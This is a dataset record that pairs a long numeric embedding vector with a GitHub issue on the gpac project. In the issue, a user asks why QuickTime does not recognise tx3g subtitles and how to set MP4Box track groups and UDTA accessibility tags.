0.0069116512313485146, 0.005423726513981819, -0.014539574272930622, 0.009953958913683891, -0.01031578704714775, 0.0011390194995328784, -0.003376445034518838, -0.012819045223295689, 0.005331423133611679, -0.002078664256259799, -0.007620538584887981, 0.03724611923098564, -0.011201896704733372, -0.006571976002305746, 0.005257580894976854, 0.0028650860767811537, -0.008019288070499897, 0.0008238045847974718, -0.00035744349588640034, 0.0025512559805065393, -0.02111893519759178, -0.02401355654001236, -0.009857963770627975, 0.033022332936525345, 0.01431804709136486, 0.021635830402374268, -0.009185997769236565, -0.000022888267267262563, 0.005264964886009693, 0.00015737667854409665, -0.029330212622880936, -0.01222092192620039, -0.02116324007511139, 0.033022332936525345, 0.006564592011272907, 0.0045117721892893314, 0.0008108821348287165, 0.004899444989860058, 0.012479370459914207, -0.016762230545282364, 0.0021082013845443726, -0.021561989560723305, 0.030482154339551926, -0.0014823867240920663, -0.0030644608195871115, -0.0006691970047540963, 0.005080359056591988, -0.0034613637253642082, -0.0036828911397606134, -0.0030607685912400484, 0.003987491130828857, -0.014842327684164047, 0.021665368229150772, -0.006852577440440655, 0.03166363388299942, -0.02687864378094673, 0.008750327862799168, 0.01058900449424982, -0.0034133661538362503, 0.007561464793980122, -0.017677877098321915, -0.012110157869756222, -0.0024220317136496305, 0.0020620496943593025, 0.01856398582458496, 0.020838333293795586, -0.009156460873782635, 0.0045191566459834576, -0.00872817449271679, 0.006808271631598473, -0.04232648015022278, 0.005863088648766279, -0.0014057751977816224, 0.002567870309576392, 0.006302451249212027, -0.018283385783433914, 0.0032582972198724747, 0.008484494872391224, -0.0010494855232536793, 0.004282861016690731, -0.003300756448879838, 0.014399273321032524, -0.003657046239823103, 0.01977500133216381, 0.015698900446295738, -0.013498395681381226, -0.012184000574052334, -0.0002856779028661549, -0.018150469288229942, 0.0028355491813272238, 0.004681610036641359, 0.0018589830724522471, -0.005866780877113342, -0.002311267890036106, -0.05378682538866997, 0.0063356803730130196, 0.00461145956069231, 0.0051800464279949665, -0.0036367394495755434, -0.007997134700417519, 0.011349581182003021, 0.0048514474183321, -0.009924422018229961, -0.0010587158612906933, 0.012833814136683941, -0.022536708042025566, 0.012110157869756222, 0.018342459574341774, -0.02268439345061779, -0.026612810790538788, -0.010692383162677288, 0.020099908113479614, -0.002909391652792692, -0.009540441446006298, -0.00928199291229248, 0.016880378127098083, -0.02370341867208481, -0.006789811421185732, -0.015757974237203598, 0.00279678194783628, -0.008085745386779308, 0.013424552977085114, 0.00223557953722775, -0.013697770424187183, 0.00824819877743721, 0.002335266675800085, -0.013727307319641113, -0.012819045223295689, 0.01832769066095352, -0.009407524950802326, -0.02159152552485466, -0.00991703849285841, 0.018785513937473297, -0.01649639755487442, 0.005479108076542616, 0.013136567547917366, 0.02067587897181511, 0.01373469177633524, 0.0009451830992475152, -0.008395884186029434, -0.021931201219558716, -0.007129486184567213, -0.02007037214934826, -0.014421425759792328, 0.009665973484516144, -0.023245595395565033, 0.00338752125389874, -0.000268832576693967, 0.010965600609779358, -0.004330858588218689, -0.0017999091651290655, 0.003232452319934964, -0.011704024858772755, 0.020794028416275978, 0.001012564287520945, 0.011430807411670685, -0.023851104080677032, -0.005010208580642939, 0.004031796474009752, 0.010101644322276115, -0.0035481287632137537, -0.007136870641261339, -0.010463472455739975, 0.011512034572660923, -0.002401724923402071, 0.013299020938575268, 0.000551510660443455, 0.011585877276957035, 0.002230041427537799, 0.010972985066473484, -0.020941711962223053, -0.027764752507209778, -0.0019457479938864708, 0.021030323579907417, 0.005896317772567272, 0.006080924067646265, -0.016156723722815514, 0.007930676452815533, 0.017973246052861214, 0.012479370459914207, -0.00329891056753695, 0.0013051648857071996, -0.0024460304994136095, -0.02625836804509163, 0.04652072861790657, -0.011785251088440418, 0.03562158718705177, 0.03668491914868355, 0.0035167455207556486, -0.0016577624483034015, 0.013557469472289085, 0.002473721280694008, 0.019317179918289185, -0.0028780086431652308, -0.04105639085173607, -0.013638696633279324, 0.024589529260993004, 0.00029560047551058233, 0.022905921563506126, 0.01704283244907856, -0.002686018357053399, 0.009939190931618214, 0.0031789164058864117, -0.0007245788001455367, 0.019878381863236427, 0.003289680229499936, 0.0036736608017235994, -0.012560596689581871, 0.0005755094462074339, -0.008262967690825462, -0.010596388019621372, -0.006933804135769606, 0.034174274653196335, -0.0037493491545319557, 0.008624795824289322, -0.008477110415697098, -0.002091586822643876, 0.017810793593525887, -0.01643732376396656, -0.0062470692209899426, 0.01723482273519039, -0.01413344033062458, -0.004419469274580479, -0.03263835236430168, 0.021133702248334885, 0.01733820140361786, 0.0005404342664405704, -0.033937979489564896, 0.020336205139756203, -0.003348754020407796, 0.013845454901456833, -0.00882417056709528, -0.0023611115757375956, -0.019420558586716652, 0.002619560109451413, -0.013823302462697029, -0.027085402980446815, -0.006084615830332041, -0.021502915769815445, -0.003232452319934964, -0.0016826842911541462, -0.007081488613039255, 0.019789770245552063, 0.02018851973116398, -0.0007615000358782709, -0.0026786341331899166, -0.0009479521540924907, -0.020941711962223053, 0.003485362511128187, -0.008004519157111645, 0.000684888509567827, 0.043035365641117096, -0.025327952578663826, -0.01225045882165432, -0.01230953261256218, -0.00019141341908834875, -0.0037456571590155363, 0.00949613656848669, -0.004087178502231836, 0.006398446392267942, -0.003817653516307473, 0.008277736604213715, -0.006985493469983339, 0.013217794708907604, -0.007162715308368206, -0.010160718113183975, -0.018120931461453438, 0.002434954047203064, 0.015802279114723206, -0.012663976289331913, -0.008706022053956985, -0.0003048307844437659, 0.011290507391095161, 0.00003821922655333765, -0.016836073249578476, -0.023437585681676865, -0.03062983974814415, -0.014399273321032524, -0.004592998884618282, -0.018061857670545578, -0.010699767619371414, -0.0045708464458584785, -0.023275133222341537, -0.008477110415697098, -0.019966991618275642, 0.031634096056222916, -0.0035961263347417116, 0.0134910112246871, -0.010153333656489849, 0.009924422018229961, -0.007096257526427507, 0.011179743334650993, -0.009370604529976845, -0.020779259502887726, -0.013306405395269394, 0.00047951427404768765, 0.01258275005966425, 0.016230566427111626, 0.0025383334141224623, -0.01464295294135809, -0.0075762332417070866, -0.013771613128483295, -0.007886371575295925, 0.00423117121681571, -0.0021285079419612885, -0.01488663349300623, 0.013084878213703632, 0.010441319085657597, -0.0015100776217877865, 0.010596388019621372, 0.02413170598447323, 0.012826429679989815, -0.012501522898674011, -0.0005099742556922138, -0.0034447491634637117, -0.003300756448879838, -0.0035444365348666906, -0.0169837586581707, -0.01174094621092081, -0.00721809733659029, 0.003367214696481824, 0.016038576140999794, 0.0052132755517959595, 0.018829818814992905, 0.009680742397904396, 0.006472288630902767, -0.01733820140361786, 0.019996529445052147, 0.010958216153085232, -0.003322909353300929, 0.003527821972966194, 0.028104428201913834, 0.0007919600466266274, -0.007336245384067297, -0.025992535054683685, -0.015846585854887962, 0.0029204681050032377, 0.0029647734481841326, -0.007834681309759617, -0.006114153191447258, -0.021739210933446884, 0.005829859524965286, -0.0064205992966890335, 0.005486492533236742, 0.011541571468114853, 0.006165842525660992, -0.0442759208381176, -0.030245859175920486, 0.0005916624795645475, 0.011814787983894348, 0.0339675173163414, 0.0017223745817318559, -0.0024460304994136095, -0.02165059931576252, 0.004666841588914394, -0.00032836804166436195, -0.013926682062447071, 0.009931806474924088, -0.003869343316182494, -0.007491314318031073, -0.0038028850685805082, -0.02340804971754551, 0.024840593338012695, -0.004799757618457079, -0.003950569778680801, -0.024899667128920555, -0.004541309084743261, 0.01216184813529253, -0.014177746139466763, -0.014842327684164047, 0.0027506304904818535, 0.01692468486726284, -0.018829818814992905, -0.026524199172854424, -0.003271219553425908, 0.031693171709775925, -0.018209543079137802, -0.007923292927443981, 0.017618803307414055, 0.00420163432136178, 0.006549823563545942, 0.007480238098651171, -0.006756582297384739, -0.01916949450969696, 0.0075762332417070866, -0.005357268266379833, -0.01965685375034809, 0.008322041481733322, -0.024294158443808556, -0.0075356196612119675, 0.010899142362177372, -0.011667103506624699, -0.019760234281420708, 0.00007499621278839186, -0.007513467222452164, 0.012043699622154236, 0.034351497888565063, -0.01413344033062458, 0.004906829446554184, -0.024190779775381088, 0.01082529965788126, -0.0006747351726517081, 0.0029444668907672167, 0.001388237695209682, 0.0046003833413124084, -0.004589306656271219, 0.008454957976937294, -0.005043437704443932, -0.004493311513215303, -0.012228306382894516, -0.00276724505238235, -0.003880419535562396, -0.019996529445052147, -0.025667628273367882, -0.01112805400043726, 0.021813053637742996, 0.0010734843090176582, 0.016658851876854897, -0.014923554845154285, 0.0030663067009299994, -0.0015516140265390277, 0.02389540895819664, -0.02342281863093376, -0.005139432847499847, -0.0075688487850129604, -0.00866910070180893, 0.02002606727182865, 0.004341934807598591, -0.020306667312979698, 0.013970986939966679, -0.00991703849285841, -0.02184258960187435, 0.005508644971996546, -0.0097028948366642, -0.01856398582458496, 0.006564592011272907, -0.014561726711690426, 0.011763098649680614, 0.016023807227611542, -0.014702027663588524, -0.009422293864190578, -0.011253586038947105, -0.01088437344878912, -0.01758926548063755, 0.015521678142249584, 0.010987753048539162, 0.0016226873267441988, 0.004537617322057486, 0.004275476559996605, -0.0025549479760229588, 0.0022891152184456587, 0.0026694037951529026, -0.017116675153374672, 0.005999697372317314, 0.015152466483414173, 0.007938060909509659, -0.0014731563860550523, -0.0024478763807564974, 0.0021100472658872604, 0.016968989744782448, 0.00520219886675477, -0.010397014208137989, -0.000014155535609461367, 0.013823302462697029, 0.010958216153085232, 0.00882417056709528, -0.00018529834051150829, 0.0010024110088124871, 0.014199898578226566, -0.003500130958855152, -0.0013476243475452065, -0.008691254071891308, 0.011054211296141148, 0.009688126854598522, -0.014303278177976608, -0.0022891152184456587, 0.011726177297532558, -0.014369736425578594, -0.008270352147519588, -0.011733561754226685, -0.022817309945821762, 0.00407979404553771, -0.002719247480854392, -0.006283990573137999, 0.0012377836974337697, 0.00012564750795718282, 0.006169534754008055, -0.0024460304994136095, -0.01837199553847313, -0.015004781074821949, -0.0036164328921586275, 0.041942499577999115, -0.00946659967303276, 0.002521718852221966, -0.016688387840986252, 0.004862523637712002, 0.005132048856467009, -0.0039062644354999065, 0.009894885122776031, -0.017869867384433746, -0.01729389652609825, 0.015137697570025921, -0.0044822352938354015, -0.00258633098565042, 0.00745808519423008, 0.004781297408044338, 0.006619973573833704, -0.0037604256067425013, 0.003442903282120824, 0.005645253695547581, 0.00762792257592082, 0.014709411188960075, 0.02061680518090725, -0.04684563726186752, -0.017663108184933662, -0.005017593037337065, -0.01151941902935505, -0.002076818374916911, 0.005120972171425819, -0.023910177871584892, 0.001593150431290269, 0.016599778085947037, 0.01983407698571682, -0.016348714008927345, -0.012974114157259464, 0.006797195412218571, 0.004437929950654507, 0.00009778352978173643, -0.008292504586279392, 0.01704283244907856, -0.011512034572660923, 0.005582487676292658, 0.0027044788002967834, 0.00008151511428877711, -0.00541264982894063, -0.0022503479849547148, 0.00479237362742424, -0.013291637413203716, 0.005630485247820616, 0.012737818993628025, -0.005036053713411093, 0.028887158259749413, 0.0030423079151660204, -0.017426813021302223, -0.010241944342851639, 0.018874123692512512, -0.020306667312979698, 0.021488146856427193, 0.026465125381946564, 0.0031419952865689993, 0.019213799387216568, 0.0097028948366642, 0.004305013455450535, 0.0035979722160845995, -0.004057641606777906, -0.0006308912415988743, -0.006760274060070515, -0.013594390824437141, -0.009747200645506382, 0.004622535780072212, -0.013719922862946987, -0.00041536366916261613, 0.009030928835272789, 0.02795674279332161, 0.012442449107766151, -0.0025641783140599728, -0.010079490952193737, -0.0003082921321038157, -0.0018036012770608068, -0.003494592849165201, -0.016289640218019485, -0.016540704295039177, -0.023334207013249397, 0.005567719228565693, 0.02492920309305191, -0.027454614639282227, 0.0017048370791599154, 0.0010974830947816372, -0.000020234556359355338, 0.007299324031919241, -0.005453263409435749, -0.005955391563475132, 0.008307273499667645, 0.002296499442309141, 0.043271660804748535, -0.011371733620762825, -0.01171140931546688, -0.015329687856137753, -0.010758841410279274, -0.0012950116069987416, -0.0137937655672431, -0.01148988213390112, 0.013527932576835155, -0.014118672348558903, 0.015728436410427094, 0.0018995964201167226, -0.029374517500400543, 0.014967859722673893, 0.005936931353062391, 0.007026107050478458, 0.005693251267075539, 0.0014463885454460979, -0.0107662258669734, -0.001098406151868403, 0.02348189242184162, 0.009776737540960312, -0.006608897354453802, -0.010906526818871498, 0.000309215160086751, -0.007317784707993269, 0.013786381110548973, -0.012028931640088558, -0.025490406900644302, 0.006461212411522865, 0.006527670659124851, 0.009503520093858242, -0.018637828528881073, 0.0045671542175114155, -0.00662735803052783, -0.021990275010466576, 0.005549258552491665, -0.005453263409435749, 0.0075688487850129604, 0.0020232824608683586, -0.00855095311999321, -0.021488146856427193, 0.004489619750529528, 0.001541460631415248, 0.003034923691302538, -0.0121323112398386, 0.012471986003220081, 0.025490406900644302, -0.002381418365985155, -0.009392756968736649, -0.019021809101104736, 0.00016810689703561366, -0.001321779447607696, -0.039638616144657135, -0.016629314050078392, -0.004371471703052521, 0.03020155243575573, 0.005043437704443932, 0.037157509475946426, -0.034971773624420166, -0.01934671588242054, 0.007373166270554066, -0.005401573609560728, 0.011896015144884586, 0.0005870473105460405, -0.0014279279857873917, -0.009835811331868172, -0.012789508327841759, 0.0028466256335377693, 0.005870473105460405, 0.0017334510339424014, 0.005216967314481735, -0.018903661519289017, 0.025401795282959938, 0.000401748955482617, 0.0009401064016856253, 0.005508644971996546, -0.0020509734749794006, 0.029005305841565132, 0.033376775681972504, 0.00781991332769394, -0.005327731370925903, -0.010470855981111526, 0.002039897022768855, 0.0014676182763651013, -0.01747111789882183, -0.027912437915802002, 0.007620538584887981, -0.0009507212671451271, 0.01825384795665741, -0.004282861016690731, -0.000837188505101949, 0.006845192983746529, 0.006546131335198879, -0.0028613940812647343, -0.001930979429744184, 0.01716098003089428, -0.001792524941265583, 0.022669624537229538, -0.013166104443371296, -0.03588742017745972, 0.01085483655333519, 0.020572500303387642, 0.00759838568046689, 0.020483888685703278, -0.013107030652463436, 0.025874387472867966, -0.008602642454206944, 0.021384766325354576, 0.0075762332417070866, -0.0070630284026265144, -0.006608897354453802, 0.0026509431190788746, 0.011992010287940502, 0.001231322530657053, -0.014761101454496384, -0.0032693734392523766, 0.01522630825638771, 0.00949613656848669, 0.019789770245552063, -0.0027229394763708115, -0.006878422107547522, -0.0003442903107497841, 0.003527821972966194, -0.004183173645287752, 0.0016623776173219085, 0.012996267527341843, -0.007923292927443981, -0.006328295916318893, 0.008233430795371532, -0.009769353084266186, 0.04046564921736717, 0.003651508130133152, -0.013616543263196945, 0.009503520093858242, -0.025091657415032387, -0.011253586038947105, -0.014635569415986538, -0.014665106311440468, 0.000047795663704164326, 0.0032509127631783485, 0.006073539610952139, -0.001940209767781198, 0.016762230545282364, 0.005900010000914335, -0.020277131348848343, 0.025342721492052078, 0.008514031767845154, 0.004101946949958801, 0.004825602751225233, 0.0003013694076798856, 0.005456955172121525, 0.00287247053347528, -0.022832078859210014, -0.02594822831451893, 0.018091395497322083, -0.0029592353384941816, -0.011231433600187302, -0.0011962472926825285, -0.00952567346394062, 0.022403793409466743, -0.025431331247091293, 0.014783253893256187, -0.013993140310049057, 0.002401724923402071, -0.006638434249907732, 0.016703156754374504, 0.007051951717585325, 0.002643558895215392, -0.012693513184785843, -0.01825384795665741, -0.008004519157111645, -0.010219791904091835, 0.0191104207187891, 0.013513164594769478, 0.011622797697782516, 0.0007481161155737936, 0.011940320953726768, 0.0236591137945652, 0.010072107426822186, 0.032667890191078186, 0.00023791106650605798, -0.015270614065229893, 0.020912175998091698, 0.0017343739746138453, 0.031929466873407364, 0.001345778233371675, 0.01440665777772665, -0.01838676445186138, 0.002900161314755678, 0.01953870616853237, 0.002909391652792692, 0.010057338513433933, 0.0007130409358069301, 0.00615476630628109, 0.0018959043081849813, -0.018047088757157326, 0.004131483845412731, 0.011083748191595078, -0.00045136184780858457, 0.006933804135769606, -0.0124276801943779, 0.013306405395269394, -0.0028226268477737904, 0.006287682801485062, -0.019553475081920624, 0.0037308887112885714, -0.009001391939818859, 0.02510642632842064, 0.0007051951834000647, 0.02141430415213108, 0.01891843043267727, 0.010840068571269512, -0.012331685051321983, -0.026051608845591545, 0.0014094673097133636, 0.005047129932790995, 0.019391020759940147, -0.027129707857966423, -0.007620538584887981, -0.008499263785779476, 0.010965600609779358, 0.015964733436703682, 0.010552083142101765, -0.004375163931399584, 0.001964208669960499, 0.013830686919391155, 0.0012987037189304829, -0.016776999458670616, 0.005084051284939051, 0.006738121621310711, -0.0038545746356248856, 0.0032730656675994396, 0.0019235952058807015, 0.0020897407084703445, -0.01710190623998642, 0.009961343370378017, 0.002769090933725238, 0.01055946759879589, -0.01680653728544712, 0.00037221197271719575, -0.006712276488542557, 0.0015008472837507725, -0.010323171503841877, 0.025992535054683685, -0.004999132361263037, -0.02553471177816391, 0.014716795645654202, 0.011548955924808979, 0.009695510379970074, -0.0010162563994526863, 0.013018419966101646, -0.010256713256239891, 0.01458387915045023, -0.003010924905538559, 0.012124926783144474, 0.008137435652315617, -0.005309270694851875, 0.010972985066473484, 0.000770268845371902, 0.006985493469983339, 0.009097387082874775, 0.003280449891462922, 0.00925245601683855, -0.020897407084703445, -0.004179481416940689, -0.006989185698330402, -0.02444184385240078, -0.02049865759909153, 0.010264097712934017, 0.02014421485364437, 0.006206456106156111, -0.0044970037415623665, -0.008026671595871449, 0.010751457884907722, -0.003710581921041012, 0.012457217089831829, -0.018224311992526054, -0.0007328860810957849, 0.0037179661449044943, -0.0037308887112885714, 0.014871864579617977, 0.0031586098484694958, -0.00931152980774641, -0.003086613491177559, 0.0056858668103814125, -0.01692468486726284, -0.006553515326231718, 0.008137435652315617, 0.014170361682772636, 0.03420381247997284, 0.024707676842808723, 0.00855095311999321, -0.0005399727378971875, -0.004120407626032829, 0.007738686632364988, 0.0031826086342334747, -0.0185049120336771, -0.023083142936229706, 0.009473983198404312, 0.0018626751843839884, 0.004884676542133093, 0.0009373372886329889, 0.010862221010029316, -0.0026177139952778816, -0.0019272873178124428, -0.0035296680871397257, 0.014340199530124664, 0.00329891056753695, 0.016540704295039177, 0.0260811448097229, -0.0034872086253017187, 0.00689688278362155, 0.0024718751665204763, -0.02026236243546009, -0.007723917718976736, -0.008816786110401154, 0.022964995354413986, 0.014421425759792328, 0.029123453423380852, 0.011091132648289204, -0.007686996832489967, 0.0013707000762224197, -0.008292504586279392, 0.0017186824698001146, 0.000366212276276201, -0.0015063855098560452, -0.00997611228376627, 0.021000785753130913, 0.006675355602055788, -0.014155593700706959, -0.009909654036164284, 0.007731302175670862, 0.001802678219974041, 0.003666276577860117, 0.0036127406638115644, 0.012988883070647717, -0.008240815252065659, -0.005239120218902826, 0.005874165333807468, 0.009318914264440536, 0.02631744183599949, 0.0011731715640053153, 0.004083486273884773, -0.002148814732208848, -0.009444446302950382, 0.049031373113393784, -0.012021547183394432, 0.001906980643980205, 0.01692468486726284, -0.01723482273519039, 0.008595258928835392, -0.024648603051900864, 0.01995222456753254, 0.005645253695547581, -0.0025198727380484343, -0.0050951275043189526, 0.010758841410279274, 0.017618803307414055, 0.015359224751591682, -0.0032158377580344677, -0.0017205285839736462, -0.01230953261256218, 0.002591869095340371, -0.004127791617065668, 0.007328860927373171, 0.0021765055134892464, -0.01854921691119671, -0.006010773591697216, 0.008255583234131336, -0.003546282649040222, -0.004729607608169317, -0.0018460607388988137, -0.0039358013309538364, 0.00027644759393297136, 0.010337939485907555, -0.0038028850685805082, 0.0019955916795879602, -0.013188257813453674, 0.004268092103302479, -0.004980671685189009, -0.011475113220512867, -0.027986280620098114, -0.006379985716193914, -0.011401270516216755, -0.0012811660999432206, -0.0028946232050657272, 0.0009507212671451271, 0.0036164328921586275, 0.0013577776262536645, 0.01897750422358513, 0.0016863764030858874, 0.01856398582458496, -0.005660022143274546, -0.02625836804509163, -0.007945445366203785, -0.009149076417088509, 0.014569111168384552, 0.012959346175193787, 0.002102663042023778, -0.023024069145321846, 0.03074798732995987, -0.016540704295039177, 0.0020897407084703445, 0.005615716800093651, 0.001807293388992548, 0.008779864758253098, 0.014273741282522678, 0.006036618258804083, 0.01905134692788124, -0.006472288630902767, -0.006557207554578781, -0.002972157672047615, -0.01565459556877613, 0.004493311513215303, -0.00807097740471363, -0.022418560460209846, 0.0018285231199115515, 0.006450136192142963, -0.009939190931618214, -0.011534187011420727, 0.004316089674830437, 0.0008828785503283143, -0.011371733620762825, 0.008418036624789238, 0.03263835236430168, 0.00035121303517371416, 0.018268616870045662, 0.009363220073282719, 0.006815656088292599, 0.007402703166007996, 0.009097387082874775, 0.0013993140310049057, -0.004401008598506451, -0.013395016081631184, 0.010869605466723442, 0.006343064364045858, -0.02292068861424923, -0.02801581658422947, 0.004707454703748226, 0.011002521961927414, 0.013513164594769478, -0.01449526846408844, -0.0034262887202203274, 0.005881549324840307, -0.0006982724298723042, 0.01233906950801611, -0.001359623740427196, -0.0005210506496950984, 0.012649208307266235, -0.009857963770627975, 0.0051283566281199455, 0.011984625831246376, 0.002268808661028743, 0.020882638171315193, -0.015802279114723206, 0.027676142752170563, -0.023629575967788696, -0.0008279582252725959, 0.012663976289331913, 0.0075356196612119675, -0.004855139646679163, 0.012228306382894516, -0.04705239459872246, -0.01334332674741745, 0.0026878644712269306, 0.0248553603887558, 0.011822172440588474, -0.005870473105460405, -0.0018432915676385164, 0.007051951717585325, 0.00037221197271719575, -0.008122666738927364, 0.008277736604213715, 0.007960213348269463, 0.0020029759034514427, -0.01146772876381874, 0.003932109102606773, -0.004884676542133093, 0.0057707857340574265, 0.05177830904722214, -0.00600338913500309, -0.0019863613415509462, 0.005301886238157749, -0.0027986280620098114, -0.0008948779432103038, -0.008181740529835224, -0.0051431250758469105, -0.014576495625078678, 0.031191041693091393, -0.021192776039242744, -0.011637566611170769, 0.0069818017072975636, -0.005637869238853455, -0.023511428385972977, -0.012331685051321983, 0.001007949118502438, 0.003575819544494152, -0.011061595752835274, -0.005264964886009693, -0.02020328864455223, -0.010714536532759666, 0.012405527755618095, -0.014576495625078678, 0.004836678970605135, 0.00013741613656748086, 0.000856110651511699, -0.01723482273519039, -0.003980106674134731, -0.03547390177845955, 0.030275395140051842, 0.01965685375034809, 0.015115545131266117, 0.019819308072328568, 0.02134046144783497, 0.0034816705156117678, 0.0006092000403441489, 0.017382508143782616, -0.004903137218207121, -0.031013820320367813, -0.00952567346394062, 0.01577274315059185, -0.01410390343517065, 0.002743246266618371, 0.014731564559042454, 0.005523413419723511, 0.0040059518069028854, -0.029758498072624207, 0.008144820109009743, 0.01661454699933529, -0.017264358699321747, 0.004113023169338703, 0.005287117790430784, 0.008816786110401154, 0.010936063714325428, -0.010286250151693821, 0.0018285231199115515, -0.018711671233177185, -0.012663976289331913, -0.02401355654001236, -0.005656329914927483, -0.004807142075151205, -0.0036367394495755434, 0.0011500958353281021, -0.013934066519141197, 0.01298149861395359, -0.00843280553817749, 0.009747200645506382, -0.02074972167611122, 0.01874120905995369, 0.0023888025898486376, -0.010441319085657597, -0.015521678142249584, -0.008742943406105042, -0.0118295568972826, -0.024958740919828415, 0.025918692350387573, -0.0012008624617010355, 0.012900272384285927, -0.013535317033529282, 0.005918470676988363, 0.002287269104272127, 0.0026786341331899166, 0.005338807590305805, -0.014192515052855015, 0.004829294979572296, -0.005135740619152784, -0.007022414822131395, -0.02038051001727581, 0.008905396796762943, 0.01482755970209837, 0.019612548872828484, -0.025032583624124527, 0.004426853731274605, 0.017663108184933662, -0.00016937607142608613, 0.0028318571858108044, -0.008536184206604958, 0.003372752806171775, 0.020823564380407333, -0.012878119014203548, 0.011622797697782516, -0.021635830402374268, 0.0038545746356248856, -0.002202350413426757, -0.010293634608387947, -0.015344456769526005, -0.005567719228565693, -0.027809057384729385, -0.01334332674741745, 0.008905396796762943, 0.004161020740866661, 0.0014343891525641084, 0.01061854138970375, 0.007177483756095171, 0.009747200645506382, 0.008713406510651112, 0.0032158377580344677, 0.01618625968694687, -0.002039897022768855, 0.004330858588218689, 0.003590587992221117, 0.033022332936525345, 0.004858831875026226, 0.016466861590743065, -0.00488098431378603, -0.014192515052855015, -0.005191122647374868, -0.0020085140131413937, 0.011172358877956867, 0.0011630182852968574, 0.010699767619371414, 0.022846847772598267, -0.012228306382894516, -0.00781991332769394, 0.00994657538831234, 0.00919338222593069, 0.0003424442547839135, 0.013365479186177254, 0.01655547320842743, -0.0063689094968140125, 0.03863435983657837, -0.002754322485998273, 0.01813570037484169, -0.016511166468262672, 0.028001047670841217, -0.0037364268209785223, -0.0057190959341824055, 0.010079490952193737, 0.007989750243723392, 0.01885935664176941, 0.015876121819019318, 0.03257928043603897, 0.002390648704022169, 0.0034558256156742573, 0.01679176837205887, 0.01874120905995369, 0.024825824424624443, -0.020602038130164146, -0.02002606727182865, 0.0008191894157789648, 0.006708584725856781, 0.006852577440440655, 0.007856834679841995, 0.012649208307266235, 0.021488146856427193, -0.005608332343399525, -0.013387632556259632, 0.02110416628420353, 0.012841198593378067, -0.023555735126137733, -0.015329687856137753, 0.010899142362177372, -0.008868475444614887, 0.004286552779376507, 0.004629920236766338, 0.010175486095249653, 0.019981760531663895, 0.0020860484801232815, 0.007273478899151087, 0.018047088757157326, 0.013055341318249702, -0.011637566611170769, -0.01473894901573658, 0.036241862922906876, -0.010367476381361485, -0.0020657419227063656, -0.00021575833670794964, -0.0020952788181602955, 0.01304057240486145, 0.010899142362177372, -0.0004340550221968442, 0.021192776039242744, -0.012449833564460278, -0.0031844547484070063, -0.009828426875174046, -0.0009590285480953753, 0.0014085442526265979, 0.022964995354413986, -0.006967033259570599, 0.009237688034772873, -0.01522630825638771, 0.011652335524559021, 0.02364434488117695 ]
3,146
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [y] I looked for a similar issue and couldn't find any. - [y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [y] I give enough information for contributors to reproduce my issue When I pack srt subs into an mp4, Quicktime isn't recognising the subtitles, e.g. fairly minimal commands: `gpac -i TOS.264 -i TOS-en.aac:#Language=en -i TOS-it.aac:#Language=it -i TOS-en.srt:#Language=en -i TOS-da.srt:#Language=da -o test.mp4` `MP4Box -group-add trackID=2:trackID=3 test.mp4` `MP4Box -group-add trackID=4:trackID=5 test.mp4` `MP4Box -disable 3 -disable 5 test.mp4` Side note, I couldn't see how to create the variant groups and disable selected tracks in the gpac command? I think the problem is that the subtitles are `text:tx3g` not `sbtl:tx3g` but I couldn't see how to change that? I'm trying to make a more complete test file with UDTA signaling for closed captions and descriptive audio. I couldn't see how to specify UDTA tags with a string using gpac so instead used MP4Box (from example here https://github.com/gpac/gpac/issues/1606#issuecomment-706069929), but again I couldn't see how to specify both name and tagc in one pass so instead e.g. `MP4Box -udta 1:type=tagc:str="public.accessibility.describes-video" -lang en TOS_enAD.m4a` `MP4Box -udta 1:type=name:str="English (describes video)" TOS_enAD.m4a` I uploaded my 12s tears of steel files here https://www.mediafire.com/file/ll2t0mu25ypaqoo/TOS_quicktime_track_signaling.zip/file I uploaded a similar file created with ffmpeg where Quicktime recognises the subs here https://www.mediafire.com/file/skd69qm19vjscn4/testffmpeg.mp4/file
Quicktime doesn't recognise subtitles and other noob related trouble with tagging tracks.
https://api.github.com/repos/gpac/gpac/issues/1861/comments
1
2021-07-20T17:26:57
2021-07-21T12:44:50Z
https://github.com/gpac/gpac/issues/1861
948,878,768
1,861
false
This is a GitHub Issue repo:gpac owner:gpac Title : Quicktime doesn't recognise subtitles and other noob related trouble with tagging tracks. Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [y] I looked for a similar issue and couldn't find any. - [y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [y] I give enough information for contributors to reproduce my issue When I pack srt subs into an mp4, Quicktime isn't recognising the subtitles, e.g. fairly minimal commands: `gpac -i TOS.264 -i TOS-en.aac:#Language=en -i TOS-it.aac:#Language=it -i TOS-en.srt:#Language=en -i TOS-da.srt:#Language=da -o test.mp4` `MP4Box -group-add trackID=2:trackID=3 test.mp4` `MP4Box -group-add trackID=4:trackID=5 test.mp4` `MP4Box -disable 3 -disable 5 test.mp4` Side note, I couldn't see how to create the variant groups and disable selected tracks in the gpac command? I think the problem is that the subtitles are `text:tx3g` not `sbtl:tx3g` but I couldn't see how to change that? I'm trying to make a more complete test file with UDTA signaling for closed captions and descriptive audio. I couldn't see how to specify UDTA tags with a string using gpac so instead used MP4Box (from example here https://github.com/gpac/gpac/issues/1606#issuecomment-706069929), but again I couldn't see how to specify both name and tagc in one pass so instead e.g. `MP4Box -udta 1:type=tagc:str="public.accessibility.describes-video" -lang en TOS_enAD.m4a` `MP4Box -udta 1:type=name:str="English (describes video)" TOS_enAD.m4a` I uploaded my 12s tears of steel files here https://www.mediafire.com/file/ll2t0mu25ypaqoo/TOS_quicktime_track_signaling.zip/file I uploaded a similar file created with ffmpeg where Quicktime recognises the subs here https://www.mediafire.com/file/skd69qm19vjscn4/testffmpeg.mp4/file --- end body ---
1,999
